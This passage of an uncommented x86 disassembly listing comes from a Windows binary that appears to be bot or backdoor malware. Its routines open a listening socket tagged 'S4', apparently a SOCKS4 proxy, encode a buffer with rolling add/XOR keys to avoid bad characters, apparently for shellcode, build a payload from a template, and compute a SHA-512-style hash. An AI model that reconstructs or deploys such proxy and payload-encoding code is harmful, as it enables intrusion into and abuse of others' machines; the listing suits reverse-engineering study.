		push	6
		stosb
		push	1
		lea	edi, [esp+16Ch+var_130]
		push	2
		rep movsd
		call	ds:dword_41D220	; socket
		push	[esp+0Ch+arg_120]
		mov	dword_428128, eax
		mov	word ptr [esp+10h+arg_0], 2
		call	ds:dword_41D270	; htons
		and	[esp+0Ch+arg_4], 0
		mov	word ptr [esp+0Ch+arg_0+2], ax
		push	10h
		lea	eax, [esp+10h+arg_0]
		push	eax
		push	dword_428128
		call	ds:dword_41D27C	; bind
		test	eax, eax
		jge	short loc_41466D
		push	offset aS4BindError ; "S4: bind() Error"
		jmp	short loc_414684
; ---------------------------------------------------------------------------

loc_41466D:				; CODE XREF: sub_4145BE+A6j
		push	0Ah
		push	dword_428128
		call	ds:dword_41D230	; listen
		test	eax, eax
		jge	short loc_4146D1
		push	offset aS4ListenError ;	"S4: listen() Error"

loc_414684:				; CODE XREF: sub_4145BE+ADj
		lea	eax, [esp+10h+arg_20]
		push	eax
		push	[esp+14h+arg_120+2]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h
		call	ds:dword_41D0DC	; GetCurrentThreadId
		push	eax
		call	sub_41481B
		pop	ecx
		xor	eax, eax
		mov	ecx, [esp+0Ch+arg_144]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	esi
		mov	ecx, [esp+arg_13C]
		xor	ecx, esp
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------

loc_4146D1:				; CODE XREF: sub_4145BE+BFj
		push	dword_427FFC
		lea	esi, [esp+10h+arg_12C]
		call	sub_4197B6
		movsx	eax, word ptr [esp+10h+arg_120]
		pop	ecx
		push	eax
		mov	eax, esi
		push	eax
		push	offset aS4SI	; "S4: %s:%i"
		lea	eax, [esp+18h+arg_20]
		push	eax
		push	[esp+1Ch+arg_120+2]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 18h
		xor	eax, eax
		mov	edi, esi
		stosd
		stosd
		stosd
		stosd

loc_414716:				; CODE XREF: sub_4145BE+1A0j
		push	0
		lea	eax, [esp+10h+arg_10]
		push	eax
		push	dword_428128
		call	ds:dword_41D234	; accept
		push	8
		mov	edi, eax
		call	sub_40340B
		mov	esi, eax
		pop	ecx
		mov	[esp+10h], esi
		and	[esp+0Ch+arg_14C], 0
		test	esi, esi
		jz	short loc_414756
		mov	ecx, edi
		push	offset sub_414446
		mov	edi, offset aSc	; "SC"
		call	sub_414884

loc_414756:				; CODE XREF: sub_4145BE+185j
		or	[esp+0Ch+arg_14C], 0FFFFFFFFh
		jmp	short loc_414716
sub_4145BE	endp

; ---------------------------------------------------------------------------
		cmp	dword ptr [eax+4], 0
		setnz	al
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414768	proc near		; CODE XREF: sub_4147FC+12p
					; sub_41481B+5Dp

var_18		= byte ptr -18h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		and	dword ptr [ebx+4], 0
		mov	eax, dword_43529C
		mov	eax, [eax]
		mov	[ebp+var_4], eax
		mov	eax, offset dword_435298
		push	esi
		push	edi
		mov	[ebp+var_8], eax
		mov	[ebp+var_10], eax

loc_414789:				; CODE XREF: sub_414768+4Cj
		mov	eax, dword_43529C
		lea	edi, [ebp+var_10]
		lea	esi, [ebp+var_8]
		mov	[ebp+var_C], eax
		call	sub_40166F
		test	al, al
		jz	short loc_4147F1
		call	sub_40164F
		mov	ecx, [ebx]
		cmp	ecx, [eax+40h]
		lea	edi, [ebp+var_18]
		jz	short loc_4147B6
		call	sub_40168C
		jmp	short loc_414789
; ---------------------------------------------------------------------------

loc_4147B6:				; CODE XREF: sub_414768+45j
		mov	eax, [ebp+var_8]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+var_4]
		lea	esi, [ebp+var_10]
		mov	[ebp+var_C], eax
		call	sub_40168C
		mov	eax, [eax+4]
		cmp	eax, dword_43529C
		jz	short loc_4147F1
		mov	ecx, [eax+4]
		mov	edx, [eax]
		mov	[ecx], edx
		mov	ecx, [eax]
		mov	edx, [eax+4]
		push	eax
		mov	[ecx+4], edx
		call	sub_40332D
		dec	dword_4352A0
		pop	ecx

loc_4147F1:				; CODE XREF: sub_414768+36j
					; sub_414768+6Bj
		push	ebx
		call	sub_40332D
		pop	ecx
		pop	edi
		pop	esi
		leave
		retn
sub_414768	endp


; =============== S U B	R O U T	I N E =======================================



sub_4147FC	proc near		; CODE XREF: sub_401FD7+77p
					; sub_4027F4+7Cp ...
		push	ebx
		mov	ebx, eax
		push	0
		push	dword ptr [ebx+4]
		call	ds:off_41D094
		test	eax, eax
		jz	short loc_414817
		call	sub_414768
		mov	al, 1
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_414817:				; CODE XREF: sub_4147FC+10j
		xor	al, al
		pop	ebx
		retn
sub_4147FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41481B	proc near		; CODE XREF: sub_414446+159p
					; sub_4145BE+E6p ...

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 1Ch
		mov	eax, dword_43529C
		mov	eax, [eax]
		push	ebx
		mov	[esp+20h+var_14], eax
		mov	eax, offset dword_435298
		push	esi
		push	edi
		mov	[esp+28h+var_18], eax
		mov	[esp+28h+var_10], eax

loc_41483F:				; CODE XREF: sub_41481B+54j
		mov	eax, dword_43529C
		lea	edi, [esp+28h+var_10]
		lea	esi, [esp+28h+var_18]
		mov	[esp+28h+var_C], eax
		call	sub_40166F
		test	al, al
		jz	short loc_41487D
		call	sub_40164F
		mov	ecx, [ebp+arg_0]
		cmp	ecx, [eax+40h]
		jz	short loc_414871
		lea	edi, [esp+28h+var_8]
		call	sub_40168C
		jmp	short loc_41483F
; ---------------------------------------------------------------------------

loc_414871:				; CODE XREF: sub_41481B+49j
		call	sub_40164F
		mov	ebx, [eax]
		call	sub_414768

loc_41487D:				; CODE XREF: sub_41481B+3Cj
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
sub_41481B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_414884	proc near		; CODE XREF: sub_40177B+246p
					; sub_4019F3+1F8p ...

var_50		= dword	ptr -50h
var_4C		= byte ptr -4Ch
var_4B		= byte ptr -4Bh
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 54h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	esi
		push	0
		push	ecx
		push	eax
		push	0
		push	0
		call	ds:off_41D090
		test	eax, eax
		mov	[esi+4], eax
		jz	short loc_4148DD
		push	edi
		lea	eax, [ebp+var_4B]
		push	38h
		push	eax
		call	sub_402EAE
		mov	eax, [esi]
		add	esp, 0Ch
		mov	[ebp+var_10], eax
		mov	eax, dword_43529C
		push	eax
		mov	ecx, offset dword_435298
		push	ecx
		lea	eax, [ebp+var_50]
		push	eax
		mov	[ebp+var_4C], 0
		mov	[ebp+var_50], esi
		call	sub_4016BA

loc_4148DD:				; CODE XREF: sub_414884+27j
		push	1
		push	dword ptr [esi+4]
		call	ds:off_41D07C
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		mov	eax, esi
		call	sub_402AD0
		leave
		retn	4
sub_414884	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4148F8	proc near		; CODE XREF: sub_41AFA7+49Dp
					; sub_41AFA7+4ABp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		cmp	[ebp+arg_0], 1
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_2], 1
		mov	[ebp+var_1], 0
		jnz	loc_414A1E
		mov	eax, [ebp+arg_4]
		lea	ecx, [eax+18h]
		and	eax, 80000001h
		mov	[ebp+arg_0], ecx
		jns	short loc_414928
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax

loc_414928:				; CODE XREF: sub_4148F8+29j
		jz	short loc_41492E
		mov	[ebp+var_1], 1

loc_41492E:				; CODE XREF: sub_4148F8:loc_414928j
		mov	eax, 172h
		cmp	ecx, eax
		jle	short loc_414941
		cmp	[ebp+var_1], 1
		jnz	loc_414B12

loc_414941:				; CODE XREF: sub_4148F8+3Dj
		inc	ecx
		cmp	ecx, eax
		mov	[ebp+var_C], ecx
		jle	short loc_414953
		cmp	[ebp+var_1], 1
		jz	loc_414B12

loc_414953:				; CODE XREF: sub_4148F8+4Fj
		mov	ebx, offset byte_435118
		jmp	short loc_41495F
; ---------------------------------------------------------------------------

loc_41495A:				; CODE XREF: sub_4148F8+F7j
		mov	eax, 172h

loc_41495F:				; CODE XREF: sub_4148F8+60j
		inc	[ebp+var_2]
		and	[ebp+var_8], 0
		push	eax
		push	0
		push	ebx
		call	sub_407F20
		add	esp, 0Ch
		push	6
		pop	ecx
		mov	esi, offset dword_425A7C
		mov	edi, ebx
		rep movsd
		mov	cl, [ebp+var_2]
		xor	edi, edi
		cmp	[ebp+arg_4], edi
		mov	byte_435126, cl
		mov	byte_43512A, cl
		jle	short loc_4149AE

loc_414994:				; CODE XREF: sub_4148F8+B4j
		mov	esi, [ebp+var_8]
		mov	al, byte_434FA0[esi]
		add	al, cl
		mov	byte_435130[esi], al
		inc	esi
		cmp	esi, [ebp+arg_4]
		mov	[ebp+var_8], esi
		jl	short loc_414994

loc_4149AE:				; CODE XREF: sub_4148F8+9Aj
		cmp	[ebp+var_1], 1
		jnz	short loc_4149BD
		mov	eax, [ebp+var_8]
		mov	byte_435130[eax], cl

loc_4149BD:				; CODE XREF: sub_4148F8+BAj
		cmp	[ebp+arg_0], edi
		mov	al, 1
		jle	short loc_4149FA

loc_4149C4:				; CODE XREF: sub_4148F8+EEj
		mov	dl, byte_435118[edi]
		xor	esi, esi

loc_4149CC:				; CODE XREF: sub_4148F8+E0j
		cmp	dl, byte_4257F4[esi]
		jz	short loc_4149DC
		inc	esi
		cmp	esi, 8
		jl	short loc_4149CC
		jmp	short loc_4149DE
; ---------------------------------------------------------------------------

loc_4149DC:				; CODE XREF: sub_4148F8+DAj
		xor	al, al

loc_4149DE:				; CODE XREF: sub_4148F8+E2j
		test	al, al
		jz	short loc_4149E8
		inc	edi
		cmp	edi, [ebp+arg_0]
		jl	short loc_4149C4

loc_4149E8:				; CODE XREF: sub_4148F8+E8j
		cmp	al, 1
		jz	short loc_4149FA
		cmp	cl, 0FFh
		jb	loc_41495A
		jmp	loc_414B12
; ---------------------------------------------------------------------------

loc_4149FA:				; CODE XREF: sub_4148F8+CAj
					; sub_4148F8+F2j ...
		cmp	[ebp+var_1], 1
		jnz	short loc_414A09
		mov	eax, [ebp+var_C]
		inc	[ebp+arg_4]
		mov	[ebp+arg_0], eax

loc_414A09:				; CODE XREF: sub_4148F8+106j
		mov	eax, [ebp+arg_4]
		cdq
		sub	eax, edx
		sar	eax, 1
		mov	byte_43511B, al
		mov	eax, [ebp+arg_0]
		jmp	loc_414B14
; ---------------------------------------------------------------------------

loc_414A1E:				; CODE XREF: sub_4148F8+15j
		cmp	[ebp+arg_0], 2
		jnz	loc_414B12
		mov	eax, [ebp+arg_4]
		lea	ecx, [eax+18h]
		and	eax, 80000001h
		mov	[ebp+arg_0], ecx
		jns	short loc_414A3D
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax

loc_414A3D:				; CODE XREF: sub_4148F8+13Ej
		jz	short loc_414A43
		mov	[ebp+var_1], 1

loc_414A43:				; CODE XREF: sub_4148F8:loc_414A3Dj
		mov	eax, 172h
		cmp	ecx, eax
		jle	short loc_414A56
		cmp	[ebp+var_1], 1
		jnz	loc_414B12

loc_414A56:				; CODE XREF: sub_4148F8+152j
		inc	ecx
		cmp	ecx, eax
		mov	[ebp+var_C], ecx
		jle	short loc_414A68
		cmp	[ebp+var_1], 1
		jz	loc_414B12

loc_414A68:				; CODE XREF: sub_4148F8+164j
		mov	ebx, offset byte_435118
		jmp	short loc_414A74
; ---------------------------------------------------------------------------

loc_414A6F:				; CODE XREF: sub_4148F8+214j
		mov	eax, 172h

loc_414A74:				; CODE XREF: sub_4148F8+175j
		inc	[ebp+var_2]
		and	[ebp+var_8], 0
		push	eax
		push	0
		push	ebx
		call	sub_407F20
		add	esp, 0Ch
		push	6
		pop	ecx
		mov	esi, offset dword_425A98
		mov	edi, ebx
		rep movsd
		mov	cl, [ebp+var_2]
		xor	edi, edi
		cmp	[ebp+arg_4], edi
		mov	byte_435126, cl
		mov	byte_43512A, cl
		jle	short loc_414AC3

loc_414AA9:				; CODE XREF: sub_4148F8+1C9j
		mov	esi, [ebp+var_8]
		mov	al, byte_434FA0[esi]
		xor	al, cl
		mov	byte_435130[esi], al
		inc	esi
		cmp	esi, [ebp+arg_4]
		mov	[ebp+var_8], esi
		jl	short loc_414AA9

loc_414AC3:				; CODE XREF: sub_4148F8+1AFj
		cmp	[ebp+var_1], 1
		jnz	short loc_414AD2
		mov	eax, [ebp+var_8]
		mov	byte_435130[eax], cl

loc_414AD2:				; CODE XREF: sub_4148F8+1CFj
		cmp	[ebp+arg_0], edi
		mov	al, 1
		jle	loc_4149FA

loc_414ADD:				; CODE XREF: sub_4148F8+207j
		mov	dl, byte_435118[edi]
		xor	esi, esi

loc_414AE5:				; CODE XREF: sub_4148F8+1F9j
		cmp	dl, byte_4257F4[esi]
		jz	short loc_414AF5
		inc	esi
		cmp	esi, 8
		jl	short loc_414AE5
		jmp	short loc_414AF7
; ---------------------------------------------------------------------------

loc_414AF5:				; CODE XREF: sub_4148F8+1F3j
		xor	al, al

loc_414AF7:				; CODE XREF: sub_4148F8+1FBj
		test	al, al
		jz	short loc_414B01
		inc	edi
		cmp	edi, [ebp+arg_0]
		jl	short loc_414ADD

loc_414B01:				; CODE XREF: sub_4148F8+201j
		cmp	al, 1
		jz	loc_4149FA
		cmp	cl, 0FFh
		jb	loc_414A6F

loc_414B12:				; CODE XREF: sub_4148F8+43j
					; sub_4148F8+55j ...
		xor	eax, eax

loc_414B14:				; CODE XREF: sub_4148F8+121j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4148F8	endp


; =============== S U B	R O U T	I N E =======================================



sub_414B19	proc near		; CODE XREF: sub_41AFA7+48Ap

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		mov	ebp, [esp+8+arg_0]
		mov	eax, ebp
		lea	edx, [eax+1]

loc_414B24:				; CODE XREF: sub_414B19+10j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414B24
		sub	eax, edx
		lea	ebx, [eax+0CCh]
		cmp	ebx, 172h
		jg	short loc_414B82
		push	esi
		push	edi
		push	ebx
		push	0
		push	offset byte_434FA0
		call	sub_407F20
		add	esp, 0Ch
		push	32h
		pop	ecx
		mov	esi, offset dword_425AB8
		mov	edi, offset byte_434FA0
		rep movsd
		movsw
		mov	eax, ebp
		movsb
		lea	esi, [eax+1]

loc_414B64:				; CODE XREF: sub_414B19+50j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414B64
		sub	eax, esi
		push	eax
		push	ebp
		push	offset word_43506A
		call	sub_407FA0
		add	esp, 0Ch
		pop	edi
		mov	eax, ebx
		pop	esi
		jmp	short loc_414B84
; ---------------------------------------------------------------------------

loc_414B82:				; CODE XREF: sub_414B19+20j
		xor	eax, eax

loc_414B84:				; CODE XREF: sub_414B19+67j
		pop	ebp
		pop	ebx
		retn
sub_414B19	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_414B90	proc near		; CODE XREF: sub_41BDAA+64p
		xor	ecx, ecx
		push	esi
		push	edi
		mov	[eax+8], ecx
		mov	[eax+0Ch], ecx
		mov	[eax], ecx
		mov	[eax+4], ecx
		lea	edi, [eax+10h]
		mov	ecx, 10h
		mov	esi, offset byte_41FEF8
		rep movsd
		pop	edi
		pop	esi
		retn
sub_414B90	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_414BC0	proc near		; CODE XREF: sub_4172D0+BEp
					; sub_4172D0+13Bp ...

var_160		= dword	ptr -160h
var_15C		= dword	ptr -15Ch
var_158		= dword	ptr -158h
var_154		= dword	ptr -154h
var_150		= dword	ptr -150h
var_14C		= dword	ptr -14Ch
var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_118		= dword	ptr -118h
var_114		= dword	ptr -114h
var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= dword	ptr -108h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_FC		= dword	ptr -0FCh
var_F8		= dword	ptr -0F8h
var_F4		= dword	ptr -0F4h
var_F0		= dword	ptr -0F0h
var_EC		= dword	ptr -0ECh
var_E8		= dword	ptr -0E8h
var_E4		= dword	ptr -0E4h
var_E0		= dword	ptr -0E0h
var_DC		= dword	ptr -0DCh
var_D8		= dword	ptr -0D8h
var_D4		= dword	ptr -0D4h
var_D0		= dword	ptr -0D0h
var_CC		= dword	ptr -0CCh
var_C8		= dword	ptr -0C8h
var_C4		= dword	ptr -0C4h
var_C0		= dword	ptr -0C0h
var_BC		= dword	ptr -0BCh
var_B8		= dword	ptr -0B8h
var_B4		= dword	ptr -0B4h
var_B0		= dword	ptr -0B0h
var_AC		= dword	ptr -0ACh
var_A8		= dword	ptr -0A8h
var_A4		= dword	ptr -0A4h
var_A0		= dword	ptr -0A0h
var_9C		= dword	ptr -9Ch
var_98		= dword	ptr -98h
var_94		= dword	ptr -94h
var_90		= dword	ptr -90h
var_8C		= dword	ptr -8Ch
var_88		= dword	ptr -88h
var_84		= dword	ptr -84h
var_80		= dword	ptr -80h
var_7C		= dword	ptr -7Ch
var_78		= dword	ptr -78h
var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		sub	esp, 160h
		mov	eax, [esp+160h+arg_0]
		mov	edx, [eax+54h]
		push	ebx
		mov	[esp+164h+var_FC], edx
		mov	edx, [eax+5Ch]
		push	ebp
		push	esi
		mov	[esp+16Ch+var_10C], edx
		mov	edx, [eax+64h]
		push	edi
		lea	esi, [eax+10h]
		mov	[esp+170h+var_4], esi
		mov	ecx, 10h
		lea	edi, [esp+170h+var_158]
		rep movsd
		mov	ecx, [eax+50h]
		mov	[esp+170h+var_100], ecx
		mov	ecx, [eax+58h]
		mov	[esp+170h+var_110], ecx
		mov	ecx, [eax+60h]
		mov	[esp+170h+var_108], ecx
		mov	ecx, [eax+68h]
		mov	[esp+170h+var_104], edx
		mov	edx, [eax+6Ch]
		mov	[esp+170h+var_B8], ecx
		mov	ecx, [eax+70h]
		mov	[esp+170h+var_B4], edx
		mov	edx, [eax+74h]
		mov	[esp+170h+var_A8], ecx
		mov	ecx, [eax+78h]
		mov	[esp+170h+var_A4], edx
		mov	edx, [eax+7Ch]
		mov	[esp+170h+var_D0], ecx
		mov	ecx, [eax+80h]
		mov	[esp+170h+var_CC], edx
		mov	edx, [eax+84h]
		mov	esi, [eax+0C4h]
		mov	[esp+170h+var_D8], ecx
		mov	ecx, [eax+88h]
		mov	[esp+170h+var_D4], edx
		mov	edx, [eax+8Ch]
		mov	[esp+170h+var_118], ecx
		mov	ecx, [eax+90h]
		mov	[esp+170h+var_114], edx
		mov	edx, [eax+94h]
		mov	[esp+170h+var_C8], ecx
		mov	ecx, [eax+98h]
		mov	[esp+170h+var_C4], edx
		mov	edx, [eax+9Ch]
		mov	[esp+170h+var_F0], ecx
		mov	ecx, [eax+0A0h]
		mov	[esp+170h+var_EC], edx
		mov	edx, [eax+0A4h]
		mov	[esp+170h+var_E8], ecx
		mov	ecx, [eax+0A8h]
		mov	[esp+170h+var_E4], edx
		mov	edx, [eax+0ACh]
		mov	[esp+170h+var_F8], ecx
		mov	ecx, [eax+0B0h]
		mov	[esp+170h+var_F4], edx
		mov	edx, [eax+0B4h]
		mov	[esp+170h+var_B0], ecx
		mov	ecx, [eax+0B8h]
		mov	[esp+170h+var_AC], edx
		mov	edx, [eax+0BCh]
		mov	[esp+170h+var_C0], ecx
		mov	ecx, [eax+0C0h]
		mov	[esp+170h+var_BC], edx
		mov	edx, [eax+0C8h]
		mov	eax, [eax+0CCh]
		xor	edi, edi
		mov	[esp+170h+var_15C], edi
		mov	[esp+170h+var_A0], ecx
		mov	[esp+170h+var_9C], esi
		mov	[esp+170h+var_E0], edx
		mov	[esp+170h+var_DC], eax
		jmp	short loc_414D5E
; ---------------------------------------------------------------------------
		align 10h

loc_414D50:				; CODE XREF: sub_414BC0+2680j
		mov	ecx, [esp+170h+var_A0]
		mov	esi, [esp+170h+var_9C]

loc_414D5E:				; CODE XREF: sub_414BC0+18Aj
		test	edi, edi
		mov	eax, [esp+170h+var_138]
		mov	edx, [esp+170h+var_134]
		jz	loc_414E48
		mov	edi, ecx
		xor	eax, eax
		mov	ebx, esi
		shrd	edi, ebx, 13h
		or	eax, edi
		mov	ebp, ecx
		mov	edx, ecx
		mov	edi, esi
		shld	esi, ebp, 3
		shr	ebx, 13h
		shl	edx, 0Dh
		or	edx, ebx
		add	ebp, ebp
		xor	ebx, ebx
		or	ebx, esi
		mov	esi, [esp+170h+var_9C]
		shrd	ecx, esi, 6
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	eax, edi
		xor	eax, ecx
		mov	ecx, [esp+170h+var_10C]
		xor	edx, ebx
		mov	[esp+170h+var_160], eax
		mov	eax, [esp+170h+var_110]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		shr	esi, 6
		xor	edx, esi
		xor	edi, edi
		or	edi, ebx
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_10C]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_110]
		shrd	ecx, eax, 7
		shr	eax, 7
		xor	edi, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+arg_0]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_100]
		adc	edx, [esp+170h+var_FC]
		add	ecx, [esp+170h+var_F0]
		adc	edx, [esp+170h+var_EC]
		mov	[eax+50h], ecx
		mov	[eax+54h], edx
		mov	eax, edx
		mov	edx, [esp+170h+var_134]
		mov	[esp+170h+var_FC], eax
		mov	[esp+170h+var_54], eax
		mov	eax, [esp+170h+var_138]
		mov	[esp+170h+var_100], ecx
		mov	[esp+170h+var_58], ecx
		jmp	short loc_414E5E
; ---------------------------------------------------------------------------

loc_414E48:				; CODE XREF: sub_414BC0+1A8j
		mov	ecx, [esp+170h+var_100]
		mov	[esp+170h+var_58], ecx
		mov	ecx, [esp+170h+var_FC]
		mov	[esp+170h+var_54], ecx

loc_414E5E:				; CODE XREF: sub_414BC0+286j
		mov	ebx, edx
		mov	esi, edx
		xor	edi, edi
		mov	ecx, eax
		shld	ebx, ecx, 17h
		or	edi, ebx
		shl	ecx, 17h
		xor	ebx, ebx
		shr	esi, 9
		or	esi, ecx
		mov	ebp, eax
		shrd	ebp, edx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_134]
		xor	esi, ebx
		shr	edx, 12h
		mov	ecx, eax
		shl	ecx, 0Eh
		or	ecx, edx
		xor	edi, ecx
		xor	ecx, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_134]
		shr	ebp, 0Eh
		mov	edx, eax
		shl	edx, 12h
		or	edx, ebp
		mov	ebp, [esp+170h+var_130]
		xor	edi, edx
		and	ebp, eax
		mov	edx, eax
		mov	eax, [esp+170h+var_12C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_11C]
		not	edx
		and	edx, [esp+170h+var_128]
		not	ebx
		and	ebx, [esp+170h+var_124]
		xor	edx, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	esi, edx
		adc	edi, ebx
		add	esi, ds:dword_41F9F8[eax*8]
		adc	edi, ds:dword_41F9FC[eax*8]
		add	esi, [esp+170h+var_58]
		mov	eax, [esp+170h+var_120]
		adc	edi, [esp+170h+var_54]
		add	eax, esi
		adc	ecx, edi
		add	[esp+170h+var_140], eax
		mov	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_120], eax
		adc	[esp+170h+var_13C], ecx
		mov	eax, [esp+170h+var_154]
		mov	ecx, [esp+170h+var_158]
		mov	edx, ecx
		mov	esi, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		mov	ecx, eax
		xor	edi, edx
		xor	esi, ebx
		shr	ecx, 7
		mov	ebx, [esp+170h+var_158]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		or	ecx, ebx
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		mov	ebx, ecx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		and	ecx, edx
		mov	edx, [esp+170h+var_14C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_144]
		and	edx, eax
		xor	ebx, ecx
		xor	ebp, edx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_120], edi
		adc	[esp+170h+var_11C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415074
		mov	eax, [esp+170h+var_E0]
		mov	ecx, [esp+170h+var_DC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_DC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_108]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_104]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_108]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_104]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_E8]
		adc	edx, [esp+170h+var_E4]
		add	ecx, [esp+170h+var_110]
		adc	edx, [esp+170h+var_10C]
		mov	[eax+58h], ecx
		mov	[eax+5Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_110], ecx
		mov	[esp+170h+var_10C], eax
		mov	[esp+170h+var_28], ecx
		jmp	short loc_415083
; ---------------------------------------------------------------------------

loc_415074:				; CODE XREF: sub_414BC0+3D5j
		mov	edx, [esp+170h+var_110]
		mov	eax, [esp+170h+var_10C]
		mov	[esp+170h+var_28], edx

loc_415083:				; CODE XREF: sub_414BC0+4B2j
